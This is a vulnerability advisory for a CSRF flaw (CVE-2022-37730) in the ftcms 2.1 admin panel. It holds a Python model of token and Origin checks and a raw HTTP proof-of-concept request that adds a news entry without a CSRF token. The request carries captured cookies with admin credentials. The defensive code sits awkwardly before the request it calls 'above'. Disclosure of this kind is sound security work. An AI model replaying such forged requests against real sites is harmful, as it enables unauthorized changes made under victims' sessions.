CVE-2022-37730: webvue/Ftcms CSRF.md at gh-pages · whiex/webvue
In ftcms 2.1, there is a Cross Site Request Forgery (CSRF) vulnerability in the PHP page. It allows an attacker to forge a link and trick the victim into clicking it or visiting a page containing attack code, so that a request is sent to the server with the victim's authentication credentials, without the victim's knowledge.
Ftcms CSRF vulnerability
Vulnerability description:
There is a CSRF vulnerability in the News.php page. It allows an attacker to forge a link and trick the victim into clicking it or visiting a page containing attack code, so that a request is sent to the server with the victim's authentication credentials, without the victim's knowledge, completing an unauthorized operation (such as a transfer, a password change, etc.).
Vulnerability impact:
Ftcms 2.1
Vulnerability code analysis:
The POST handler receives the parameters submitted by the user and inserts them into the database. This key operation is not verified (no anti-CSRF token is checked), and the request's source address (Origin/Referer) is not checked to confirm it came from the site itself.
Vulnerability reproduction PoC:
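The two missing checks named above, as a Python model of what the server-side news/add handler should do before inserting anything into the database. This is an added example, not ftcms code (ftcms is PHP; the same logic would live in its controller): a per-session anti-CSRF token bound to the session with an HMAC, plus an Origin/Referer check against the site's own origin. The server secret, the session id, the site origin `http://127.0.0.1` and the cross-site origin `attacker.invalid` are constructed values, and the sample form reuses the PoC's field names.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Hypothetical values for the model (constructed, not from ftcms).
SERVER_SECRET = b"constructed-server-side-secret"
SITE_ORIGIN = "http://127.0.0.1"  # the origin the admin panel is served from


def issue_csrf_token(session_id: str) -> str:
    """Derive a per-session anti-CSRF token as HMAC(secret, session id).

    The server renders this into the news/add form as a hidden field. A page on
    another origin cannot read it, so a forged form cannot carry a valid one.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_is_trusted(headers: dict) -> bool:
    """Require a source header (Origin, else Referer) that matches the site origin.

    Browsers attach Origin to cross-site POSTs, so a request forged from an
    attacker-controlled page arrives labelled with that page's origin, not ours.
    """
    h = {k.lower(): v for k, v in headers.items()}
    source = h.get("origin") or h.get("referer")
    if not source:
        return False  # a state-changing request must identify its source
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def verify_news_add(headers: dict, form: dict, session_id: str) -> tuple:
    """Checks the news/add handler should run before inserting the form fields.

    Returns (accepted, reason). The token is the primary defence; the source
    check is defence in depth, so a request must pass both.
    """
    if not origin_is_trusted(headers):
        return False, "untrusted or missing Origin/Referer"
    expected = issue_csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "accepted"


# Constructed sample: the PoC's form fields, which carry no token at all.
POC_FORM = {
    "info[catid]": "1", "info[title]": "test", "info[keyword]": "test",
    "info[des]": "test", "info[content]": "test", "info[status]": "1",
    "dosubmit": "提交",
}
VICTIM_SESSION = "constructed-session-id"

# A cross-site submission of that form (Origin is the attacker's page).
FORGED_HEADERS = {"Host": "127.0.0.1", "Origin": "http://attacker.invalid"}
# A submission from the admin panel itself.
GENUINE_HEADERS = {"Host": "127.0.0.1", "Origin": SITE_ORIGIN}


def demo() -> tuple:
    """Run the three cases: forged, same-origin without token, genuine."""
    forged = verify_news_add(FORGED_HEADERS, POC_FORM, VICTIM_SESSION)
    replay = verify_news_add(GENUINE_HEADERS, POC_FORM, VICTIM_SESSION)
    genuine_form = dict(POC_FORM, csrf_token=issue_csrf_token(VICTIM_SESSION))
    genuine = verify_news_add(GENUINE_HEADERS, genuine_form, VICTIM_SESSION)
    return forged, replay, genuine


if __name__ == "__main__":
    for label, result in zip(("forged", "same-origin, no token", "genuine"), demo()):
        print(f"{label}: {result}")
```

Note that the PoC request above shows `Origin: http://127.0.0.1` only because it was captured from the administrator's own browser session; the same form submitted from an attacker's page arrives with that page's origin, which the model rejects first. Even a same-origin replay of the PoC body is rejected because the form carries no token, which is why the token check, not the header check, is the one the fix cannot omit.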
```http
POST /ftcms_v2.1/admin/index.php/news/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------305284134012023868703806459884
Content-Length: 1526
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ftcms_v2.1/admin/index.php/news/add
Cookie: UM_distinctid=17fa054f6b24c4-01fb2c97ea5a758-4c3e2d72-14a61c-17fa054f6b42db; CNZZDATA1277817436=1845628291-1647658540-%7C1647658540; skinColor=%2Ftemplets%2Fyycms%2Fcss%2Fmytheme-color1.css%3Fv%3D2.3; history=%5B%7B%22name%22%3A%22%E6%88%98%E7%8B%BC%E7%89%B9%E6%94%BB%E9%98%9F%22%2C%22pic%22%3A%22%22%2C%22link%22%3A%22%2Fqxplay%2F82.html%22%2C%22part%22%3A%221%22%7D%5D; debug-bar-tab=ci-events; debug-bar-state=minimized; Hm_lvt_ff7ff59731fd28defa244db58332ee7f=1659488611; Hm_lpvt_ff7ff59731fd28defa244db58332ee7f=1659488611; PHPSESSID=4cdcf6d279bf87697a923efd30719924; username=admin; pwd=admin; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a9ea257045ad5d13deed7226ce5549a5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A80%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A103.0%29+Gecko%2F20100101+Firefox%2F103.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1659507364%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221659489291%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7Dbfe0c537b0aa2eb962fc064b6473bfcd43257af7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Forwarded-For: 127.0.0.1

-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[catid]"

1
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[title]"

test
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[keyword]"

test
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[des]"

test
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[image]"


-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[content]"

test
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[add_introduce]"

1
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[introcude_length]"

255
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[auto_thumb]"

1
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[status]"

1
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="info[hits]"

0
-----------------------------305284134012023868703806459884
Content-Disposition: form-data; name="dosubmit"

提交
-----------------------------305284134012023868703806459884--
```

When the victim visits the forged link, the news entry is successfully added.